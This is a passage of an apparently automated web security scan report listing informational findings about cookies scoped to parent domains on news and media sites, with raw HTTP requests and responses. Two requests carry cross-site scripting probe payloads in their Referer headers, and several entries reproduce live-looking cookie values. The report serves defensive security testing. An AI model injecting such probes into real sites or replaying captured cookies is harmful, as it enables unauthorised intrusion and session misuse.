16.277. http://www.msnbc.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

SSID=AwDszSkAAAAAg6hETc0GBAmDqERNAQAAAAAAAAAAAAAAAACDqERNAAAAAAAAAAAAAAA; path=/; domain=.redacted; expires=Sun, 29-Jan-2012 23:53:39 GMT
SSSC=108.G5567760320082216653.1.0.0; path=/; domain=.redacted
SSRT=g6hETQE; path=/; domain=.redacted; expires=Sun, 29-Jan-2012 23:53:39 GMT
MC1=GUID=a90948ea4b8d4829b2d58fc150cbb23e; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Content-Type: text/html; charset=utf-8
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
RTSS: 1
Expires: Sat, 29 Jan 2011 23:53:39 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 23:53:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=1; path=/; domain=.redacted
Set-Cookie: SSID=AwDszSkAAAAAg6hETc0GBAmDqERNAQAAAAAAAAAAAAAAAACDqERNAAAAAAAAAAAAAAA; path=/; domain=.redacted; expires=Sun, 29-Jan-2012 23:53:39 GMT
Set-Cookie: SSSC=108.G5567760320082216653.1.0.0; path=/; domain=.redacted
Set-Cookie: SSRT=g6hETQE; path=/; domain=.redacted; expires=Sun, 29-Jan-2012 23:53:39 GMT
Set-Cookie: MC1=GUID=a90948ea4b8d4829b2d58fc150cbb23e; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
Content-Length: 208222

<html><head>
<script language='javascript' type='text/javascript'>
<!--
req_108_1296345219=new Image();
req_108_1296345219.src='/__ssobj/ard.png?5567760320082216653_1_0-108-'+(11527*112461
...[SNIP]...

16.278. http://www.msnbc.redacted/id/8004316/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/8004316/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

SSID=AwBTfCkAAAAApMVETRqCDgWkxURNAQAAAAAAAAAAAAAAAACkxURNAAAAAAAAAAAAAAA; path=/; domain=.redacted; expires=Mon, 30-Jan-2012 01:57:56 GMT
SSSC=108.G5567792347586920986.1.0.0; path=/; domain=.redacted
SSRT=pMVETQE; path=/; domain=.redacted; expires=Mon, 30-Jan-2012 01:57:56 GMT
MC1=GUID=6db8003adf854298adce0bc40466cda9; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /id/8004316/?from=en-us_msnhp HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.279. http://www.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.newsvine.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

vid=20d3e915c99117443eb51b0c141f325f; expires=Sat, 25-Jan-2031 03:13:58 GMT; path=/; domain=.newsvine.com
sprout=2_cd9e4WPi9S8TA65nc4FRmISDbfld%2Bz1WpHy7rW3XmiijWVlFj9YKULk5rqZPYHTNzk9GF6CO7%2BXYkzPwgSOo13YhzbUSSyLOwO%2B6vGq3ySXmjD3Eg7P%2BQKpYWNqjYOuPuseiwN7bnR0vLsw97nbakOqq0wOdY0LAfFr8pXvFQl%2FEpbRgscYoYMKCLzqOimQzpLcu%2BPb3ZHvuf5qssV1%2Fch3eCPGUjyRGW%2BsBRftbD%2B1ztBgY4jcQ9ZW4CmzltUsM; expires=Sat, 25-Jan-2031 03:14:08 GMT; path=/; domain=.newsvine.com
vid=20d3e915c99117443eb51b0c141f325f; expires=Sat, 25-Jan-2031 03:14:08 GMT; path=/; domain=.newsvine.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.280. http://www.newsvine.com/_action/article/emailThis previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.newsvine.com
Path:	/_action/article/emailThis

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

vid=303dface27cc204606d11d8c52727498; expires=Sat, 25-Jan-2031 01:22:40 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_action/article/emailThis HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:22:40 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=303dface27cc204606d11d8c52727498; expires=Sat, 25-Jan-2031 01:22:40 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Length: 2
Content-Type: text/html; charset=UTF-8
Connection: close

[]

16.281. http://www.newsvine.com/_action/user/logout previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.newsvine.com
Path:	/_action/user/logout

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

vid=db35f4d8c2ee469511377500991f260f; expires=Sat, 25-Jan-2031 01:22:40 GMT; path=/; domain=.newsvine.com
sprout=deleted; expires=Sat, 30-Jan-2010 01:22:44 GMT; path=/; domain=.newsvine.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /_action/user/logout HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 01:22:40 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=db35f4d8c2ee469511377500991f260f; expires=Sat, 25-Jan-2031 01:22:40 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Set-Cookie: sprout=deleted; expires=Sat, 30-Jan-2010 01:22:44 GMT; path=/; domain=.newsvine.com
Location: http://www.newsvine.com/_action/user/logout?domains=newsvine.msnbc.redacted,newsvine.nbcsports.msnbc.com,newsvine.todayshow.com,newsvine.today.com&redirect=http%3A%2F%2Fwww.newsvine.com%3F412586518
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Connection: close

16.282. http://www.newsvine.com/_action/user/startTracking previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.newsvine.com
Path:	/_action/user/startTracking

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

vid=fd03e0f2b9d7ca49ce9718040d6e1a3e; expires=Sat, 25-Jan-2031 01:22:46 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_action/user/startTracking HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:22:46 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=fd03e0f2b9d7ca49ce9718040d6e1a3e; expires=Sat, 25-Jan-2031 01:22:46 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Length: 1
Content-Type: text/html; charset=UTF-8
Connection: close

1

16.283. http://www.newsvine.com/_action/user/stopTracking previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.newsvine.com
Path:	/_action/user/stopTracking

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

vid=da0aaca01f1bdb2b9d0331ebe22cd506; expires=Sat, 25-Jan-2031 01:22:41 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_action/user/stopTracking HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:22:41 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=da0aaca01f1bdb2b9d0331ebe22cd506; expires=Sat, 25-Jan-2031 01:22:41 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Length: 1
Content-Type: text/html; charset=UTF-8
Connection: close

1

16.284. http://www.newsvine.com/_api/comments/getComments previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.newsvine.com
Path:	/_api/comments/getComments

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

vid=dd4c8a8b287a263f2b369a781f45cf81; expires=Sat, 25-Jan-2031 01:22:32 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_api/comments/getComments HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:22:32 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=dd4c8a8b287a263f2b369a781f45cf81; expires=Sat, 25-Jan-2031 01:22:32 GMT; path=/; domain=.newsvine.com
Cache-Control: max-age=60
Expires: Sun, 30 Jan 2011 01:23:32 GMT
Content-Length: 65
Content-Type: application/json
Connection: close

{"response":{"article":[{"contentId":-1,"totalComments":0}]}}

16.285. http://www.newsvine.com/_api/question/getUserData previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.newsvine.com
Path:	/_api/question/getUserData

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

vid=b6d269731f7b23d3d635e08d43a4e32a; expires=Sat, 25-Jan-2031 01:22:30 GMT; path=/; domain=.newsvine.com
sprout=2_ETgH90q4mmpKrplAT%2FojPtfDv1tyMX8UV6jlrOysUd90BKEDCm0aoi0FwxnpYVKWleRFa3Ulo4SKWGMb99RplWdwKeghAoVrr8K20BurdgW%2FkEpl32D30gpAMgzDVH6lNk1PtyVKm3uSNcZbTeNwkkZW4QvNCRwjcsUWpNAqkpfEe%2FMdFu9IgMgjhg%2FOnTqFcJdXLKqNulF%2FWPxaXGSIyL1DRHmhet5xnv7IJBHm3l2dcMmGTV2QrfJPwX%2BHl10n; expires=Sat, 25-Jan-2031 01:22:35 GMT; path=/; domain=.newsvine.com
vid=b6d269731f7b23d3d635e08d43a4e32a; expires=Sat, 25-Jan-2031 01:22:35 GMT; path=/; domain=.newsvine.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /_api/question/getUserData HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:22:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=b6d269731f7b23d3d635e08d43a4e32a; expires=Sat, 25-Jan-2031 01:22:30 GMT; path=/; domain=.newsvine.com
Set-Cookie: sprout=2_ETgH90q4mmpKrplAT%2FojPtfDv1tyMX8UV6jlrOysUd90BKEDCm0aoi0FwxnpYVKWleRFa3Ulo4SKWGMb99RplWdwKeghAoVrr8K20BurdgW%2FkEpl32D30gpAMgzDVH6lNk1PtyVKm3uSNcZbTeNwkkZW4QvNCRwjcsUWpNAqkpfEe%2FMdFu9IgMgjhg%2FOnTqFcJdXLKqNulF%2FWPxaXGSIyL1DRHmhet5xnv7IJBHm3l2dcMmGTV2QrfJPwX%2BHl10n; expires=Sat, 25-Jan-2031 01:22:35 GMT; path=/; domain=.newsvine.com
Set-Cookie: vid=b6d269731f7b23d3d635e08d43a4e32a; expires=Sat, 25-Jan-2031 01:22:35 GMT; path=/; domain=.newsvine.com
Cache-Control: max-age=60
Expires: Sun, 30 Jan 2011 01:23:30 GMT
Content-Length: 244
Content-Type: application/json
Connection: close

{"response":{"user":{"domainName":"","displayName":"","state":"0","zip":"","city":"Washington, DC","country":"United States","url":"http:\/\/www.newsvine.com","avatar":"http:\/\/www.polls.newsvine
...[SNIP]...

16.286. http://www.newsvine.com/_api/user/convTracker previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.newsvine.com
Path:	/_api/user/convTracker

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

vid=9dec2eaf0c58fea05fb0af38815eba6e; expires=Sat, 25-Jan-2031 01:22:37 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_api/user/convTracker HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:22:37 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=9dec2eaf0c58fea05fb0af38815eba6e; expires=Sat, 25-Jan-2031 01:22:37 GMT; path=/; domain=.newsvine.com
Cache-Control: max-age=60
Expires: Sun, 30 Jan 2011 01:23:37 GMT
Content-Length: 304
Content-Type: application/json
Connection: close

{"tracker":{"a":{"articles":[],"counts":{"articles":0,"comments":0,"friendComments":0,"page":1,"perpage":5}},"t":{"articles":[],"counts":{"articles":0,"comments":0,"friendComments":0,"page":1,"perpage
...[SNIP]...

16.287. http://www.newsvine.com/_nv/accounts/newsvine/emailAlerts previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.newsvine.com
Path:	/_nv/accounts/newsvine/emailAlerts

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

vid=18a3a9b666afd80ee07c9bbefeb2196f; expires=Sat, 25-Jan-2031 03:13:08 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_nv/accounts/newsvine/emailAlerts HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 03:13:08 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=18a3a9b666afd80ee07c9bbefeb2196f; expires=Sat, 25-Jan-2031 03:13:08 GMT; path=/; domain=.newsvine.com
Location: https://www.newsvine.com/_nv/accounts/newsvine/emailAlerts
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Connection: close

16.288. http://www.newsvine.com/_nv/api/accounts/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.newsvine.com
Path:	/_nv/api/accounts/login

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

vid=97b5abf04012c58b24dcf031f2dd315f; expires=Sat, 25-Jan-2031 01:22:26 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_nv/api/accounts/login HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 01:22:26 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=97b5abf04012c58b24dcf031f2dd315f; expires=Sat, 25-Jan-2031 01:22:26 GMT; path=/; domain=.newsvine.com
Location: https://www.newsvine.com/_nv/api/accounts/login
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Connection: close

16.289. http://www.newsvine.com/_tools/user/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.newsvine.com
Path:	/_tools/user/login

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

vid=3670341b4e7c29240de918b35bcfb885; expires=Sat, 25-Jan-2031 01:58:04 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_tools/user/login HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.290. http://www.newsvine.com/_vine/js/m1/global.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.newsvine.com
Path:	/_vine/js/m1/global.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

vid=55d515b4f7dadf9aee6395750020b187; expires=Sat, 25-Jan-2031 17:20:53 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_vine/js/m1/global.js?v=23247 HTTP/1.1
Host: www.newsvine.com
Proxy-Connection: keep-alive
Referer: http://wbenedetti.newsvine.com/?2efa1%22-alert(1)-%22fb67b00e4a1=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sprout=2_PqiLNG8SFmQW8X%2BSbvHhIaQDDrylppT5AYg38YcbZ9nVTR8kG5RsiVu%2Byu1tJBD9uostGX%2FgO7wgSaC9LY0BxepgpfVGhwtOvjqbjk9G%2F0aWJY3jKGNJFq0uN4pAaO2V7eJc%2FrvMgTEqRy9ueckdj0wQyfJmL0oh4o9pwBcp9RbpE129gAZ0vY9RD8lhmoOR3DT1xy5pJRukUI4myv8AbN7gTgSVWGrjBguMbtU2gBmjNsA9C6eGORSajKZnC%2B%2B0; TZM=-360; s_cc=true; s_sq=%5B%5BB%5D%5D; vid=45f73cc22cc66ac775a363e022c73cd5

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:20:53 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=55d515b4f7dadf9aee6395750020b187; expires=Sat, 25-Jan-2031 17:20:53 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Cache-Control: max-age=604800
Expires: Sun, 06 Feb 2011 17:20:53 GMT
Content-Length: 383
Content-Type: text/javascript

var globalPokeURL = 'http://log.newsvine.com/poke.gif';
var globalImgRoot = 'http://www.newsvine.com/_vine/images/_/';
var globalRegisterRoot = 'https://www.newsvine.com/_nv/accounts/register';
v
...[SNIP]...

16.291. https://www.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.newsvine.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

vid=55d515b4f7dadf9aee6395750020b187; expires=Sat, 25-Jan-2031 17:02:03 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.292. https://www.newsvine.com/_action/user/logout previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.newsvine.com
Path:	/_action/user/logout

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

vid=a518bd3650bb791008fc921ee62dad0e; expires=Sat, 25-Jan-2031 03:20:10 GMT; path=/; domain=.newsvine.com
sprout=deleted; expires=Sat, 30-Jan-2010 03:20:14 GMT; path=/; domain=.newsvine.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /_action/user/logout HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.293. https://www.newsvine.com/_nv/accounts/global/information previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.newsvine.com
Path:	/_nv/accounts/global/information

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

vid=3baaa49edd0123eafe283532e331e3c0; expires=Sat, 25-Jan-2031 01:22:51 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_nv/accounts/global/information HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.294. https://www.newsvine.com/_nv/accounts/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.newsvine.com
Path:	/_nv/accounts/login

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

vid=f8216a56010cce7056bb2bebc2b8ea2f; expires=Sat, 25-Jan-2031 01:58:45 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_nv/accounts/login HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.295. https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.newsvine.com
Path:	/_nv/accounts/msnbc/emailAlerts

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

vid=0e0c419af9db7beaa9782211b1d63042; expires=Sat, 25-Jan-2031 03:14:53 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_nv/accounts/msnbc/emailAlerts HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.296. https://www.newsvine.com/_nv/accounts/msnbc/newsletters previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.newsvine.com
Path:	/_nv/accounts/msnbc/newsletters

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

vid=612c76b17edbcde9ea20fe784e8a625d; expires=Sat, 25-Jan-2031 01:23:00 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_nv/accounts/msnbc/newsletters HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.297. https://www.newsvine.com/_nv/accounts/register previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.newsvine.com
Path:	/_nv/accounts/register

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

vid=209e83103b98465a328a2c9ac4b644ca; expires=Sat, 25-Jan-2031 01:22:53 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_nv/accounts/register HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.298. https://www.newsvine.com/_nv/api/accounts/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.newsvine.com
Path:	/_nv/api/accounts/login

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

vid=aa6836e6849505e061ea2e467e70f836; expires=Sat, 25-Jan-2031 01:22:51 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_nv/api/accounts/login HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.299. https://www.newsvine.com/_nv/api/accounts/resetPassword previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.newsvine.com
Path:	/_nv/api/accounts/resetPassword

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

vid=b87462d701086cc5258ca445f8422d6b; expires=Sat, 25-Jan-2031 03:14:02 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_nv/api/accounts/resetPassword HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.300. http://www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.terra.com
Path:	/$\|www.people.com/$\|http:/www.walmart.com/\|http:/www.walmart.com/cp/toys/4171\|http:/www.walmart.com/cp/Electronics/3944

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

WEBTRENDS_ID=173.193.214.243-1296353013.43280; path=/; expires=Fri, 01-Jan-2016 00:02:15 GMT; domain=.terra.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944 HTTP/1.1
Host: www.terra.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 02:03:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Status: 404 Not Found
Location: http://buscador.terra.com/404.aspx?ca=z&query=$%7Cwww&source=Search&curl=http://www.terra.com/$%7Cwww.people.com/$%7Chttp:/www.walmart.com/%7Chttp:/www.walmart.com/cp/toys/4171%7Chttp:/www.walmart.com/cp/Electronics/3944
Vary: User-Agent,Accept-Encoding
Content-Length: 0
Content-Type: text/html
Set-Cookie: WEBTRENDS_ID=173.193.214.243-1296353013.43280; path=/; expires=Fri, 01-Jan-2016 00:02:15 GMT; domain=.terra.com
Connection: close

16.301. http://www.youtube.com/embed/CKZzn00w01M previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/embed/CKZzn00w01M

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
GEO=3887f2ae992adacf44a634e80b061986cwsAAAAzVVOtwdbzTUWl9w==; path=/; domain=.youtube.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /embed/CKZzn00w01M HTTP/1.1
Host: www.youtube.com
Proxy-Connection: keep-alive
Referer: http://cartoonblog.msnbc.redacted/?9bcba%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea8948eec705=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
